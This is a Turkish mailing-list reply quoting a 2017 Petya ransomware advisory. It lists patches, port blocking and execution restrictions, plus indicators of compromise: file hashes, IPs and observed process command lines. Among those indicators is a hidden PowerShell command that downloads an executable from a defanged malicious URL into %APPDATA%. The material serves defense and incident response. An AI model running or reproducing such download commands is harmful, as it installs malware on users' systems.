Merhaba Yapilacaklar icin asagidakilere bakabirsiniz.
Kaynak: https://www.cyberbit.com/endpoint-security/petya-ransomware/ What you should do 1. Patch Microsoft Office to prevent infection via Microsoft Word attachments – install the CVE-2017-0199 update <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199> to patch Microsoft Office/WordPad Remote Code Execution Vulnerability. 2. Patch Windows Workstations: if you have not done that after the WannaCry attack install the SMBv1 patch <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> now in order to prevent the attack from spreading. 3. Use gPO to block SMB & WMI protocols E- 135,445,1024-1035 TCP as an additional safety measure preventing the EternalBlue exploit. 4. Disable shutdown via command line: disables the option to use cmd /k shutdown -a. This command is used by the malware to initially shut down the computer, after which the computer will boot from the new malware boot loader. 5. Disable file execution in appdata and temp paths: disable the option to run .exe files in paths %AppData% and %Temp%. 6. IOCs: Files: File Name Order-20062017.doc MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1 SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84 SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206 File Size 6215 bytes File Type Rich Text Format data File Name myguy.xls MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25 SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73 SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6 File Size 13893 bytes File Type Zip archive data File Name BCA9D6.exe MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060 SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD File Size 275968 bytes IPs: 141.115.108 165.29.78 200.16.242 90.139.247 Processes: mtshta.exe %WINDIR%\System32\mshta.exe” “C:\myguy.xls.hta” ” (PID: 2324) powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘h11p://french-cooking.com/myguy.exe’, ‘%APPDATA%\10807.exe’);” (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile(‘h11p://french-cooking.com/myguy.exe’, ‘%APPDATA%\10807.exe’) [image: 😉] .10807 exe %APPDATA%\10807.exe” ” (PID: 3096) On Jun 28, 2017 9:24 AM, "Kayhan Yüksel" <[email protected]> wrote: > Merhaba > > Petya ransomware inin etkilediği sistemlerin sürümleri ile listesi, hangi > zaafiyetleri kullanarak yayıldığı ve engellenmesi için gerekli tedbirleri > içeren kaynak önerebilir misiniz? > Teşekkürler, iyi çalışmalar > > Kayhan Yüksel > > > ------------------------------------------------- > Sinara Labs. E-Posta Tehdit Simülasyonu > > ets.sinaralabs.com > > ------------------------------------------------- >
------------------------------------------------- Sinara Labs. E-Posta Tehdit Simülasyonu ets.sinaralabs.com -------------------------------------------------
